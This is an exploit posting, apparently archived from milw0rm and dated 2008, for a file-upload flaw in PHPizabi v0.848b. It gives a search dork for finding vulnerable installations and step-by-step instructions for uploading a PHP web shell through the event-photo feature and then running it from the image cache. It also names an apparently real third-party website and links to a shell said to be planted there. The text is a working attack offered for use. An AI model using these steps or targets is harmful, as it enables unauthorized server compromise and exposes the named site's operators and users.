57 lines
No EOL
1.5 KiB
Text
57 lines
No EOL
1.5 KiB
Text
############################################
|
|
Powered by PHPizabi v0.848b C1 HFP1 remote file upload
|
|
|
|
author: ZoRLu
|
|
|
|
home: www.yildirimordulari.org
|
|
|
|
contact: trt-turk@hotmail.com
|
|
|
|
dork: "Powered by PHPizabi v0.848b C1 HFP1"
|
|
|
|
############################################
|
|
|
|
exploit:
|
|
|
|
http://localhost/izabi/system/cache/pictures/id_shell.php
|
|
|
|
-first register web site
|
|
|
|
-Create an event on the click and create an event ( direct create event url: http://localhost/izabi/?L=events.create )
|
|
|
|
-event title and description write. show to select All the users. gözat button click and shell.php upload
|
|
|
|
-after go to event page. upload photo right click. open the menu click to properties. copy the url
|
|
|
|
example:
|
|
|
|
http://localhost/izabi/system/image.php?file=xxx_shell.php&width=500
|
|
|
|
and
|
|
|
|
exploit:
|
|
|
|
http://localhost/izabi/system/cache/pictures/xxx_shell.php
|
|
|
|
example web site:
|
|
|
|
http://bitchinindie.com/system/image.php?file=597_shell.php&width=500
|
|
|
|
exploit shell.php
|
|
|
|
http://bitchinindie.com/system/cache/pictures/597_shell.php
|
|
|
|
|
|
##################################################
|
|
|
|
thanx: str0ke, FaLCaTa, ReD_KaN, edish, harded, aRKi, z3h!r, the_KaM!L, vur6un, siircicocuk, Dr. SaLTuK, kasýrga(lavrens), avkidis, head_hunter
|
|
|
|
and all users yildirimordulari.org
|
|
|
|
siircicocuk nerelerdesin be kanka msn e takýl özlettin kendini :)))
|
|
|
|
## yildirimordulari.org açýlýr mý açýlmaz mý orasý bilinmez ama bilinen birþey var o bir efsane ##
|
|
|
|
#################################################
|
|
|
|
# milw0rm.com [2008-02-17] |